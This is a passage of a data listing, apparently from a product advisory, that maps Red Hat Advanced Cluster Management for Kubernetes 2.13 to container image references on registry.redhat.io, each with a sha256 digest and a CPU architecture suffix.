"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
